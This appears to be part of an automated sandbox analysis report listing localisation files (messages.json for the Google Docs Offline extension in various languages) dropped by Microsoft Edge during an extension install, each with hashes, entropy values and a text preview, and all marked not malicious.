                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):972
                                                                                                                                                                                                                                                                              Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                              MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                              SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                              SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                              SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):990
                                                                                                                                                                                                                                                                              Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                              MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                              SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                              SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                              SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1658
                                                                                                                                                                                                                                                                              Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                              MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                              SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                              SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                              SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1672
                                                                                                                                                                                                                                                                              Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                              MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                              SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                              SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                              SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):935
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                              MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                              SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                              SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                              SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1065
                                                                                                                                                                                                                                                                              Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                              MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                              SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                              SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                              SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2771
                                                                                                                                                                                                                                                                              Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                              MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                              SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                              SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                              SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):858
                                                                                                                                                                                                                                                                              Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                              MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                              SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                              SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                              SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):954
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                              MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                              SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                              SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                              SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):899
                                                                                                                                                                                                                                                                              Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                              MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                              SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                              SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                              SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2230
                                                                                                                                                                                                                                                                              Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                              MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                              SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                              SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                              SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1160
                                                                                                                                                                                                                                                                              Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                              MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                              SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                              SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                              SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3264
                                                                                                                                                                                                                                                                              Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                              MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                              SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                              SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                              SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                              Malicious:false
